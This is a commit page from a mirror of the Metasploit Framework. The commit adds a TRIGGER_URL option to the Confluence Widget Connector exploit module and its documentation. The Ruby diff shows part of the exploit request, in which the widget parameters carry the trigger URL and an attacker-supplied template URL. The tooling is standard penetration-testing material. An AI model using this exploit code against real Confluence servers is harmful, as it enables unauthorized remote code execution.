infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added TRIGGER_URL option

master
rrockru 2019-04-12 00:12:27 +03:00
parent 91eb29b1fe
commit 82def16953
2 changed files with 5 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
modules/exploits/multi/http/confluence_widget_connector.md
View File

@ -30,6 +30,7 @@ List the steps needed to make sure this thing works
# Options # Options
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default) - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
- **TRIGGER_URL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
# Scenario # Scenario
## Tested on Confluence 6.8.2 with Windows target ## Tested on Confluence 6.8.2 with Windows target

6
modules/exploits/multi/http/confluence_widget_connector.rb
View File

@ -59,7 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'The base to Confluence', '/']) OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
OptString.new('TRIGGER_URL', [true, 'Url to external video service to trigger vulnerability',
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
]) ])
end end
@ -212,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
'name' => 'widget', 'name' => 'widget',
'body' => '', 'body' => '',
'params' => { 'params' => {
'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ', 'url' => datastore['TRIGGER_URL'],
'_template' => service_url '_template' => service_url
} }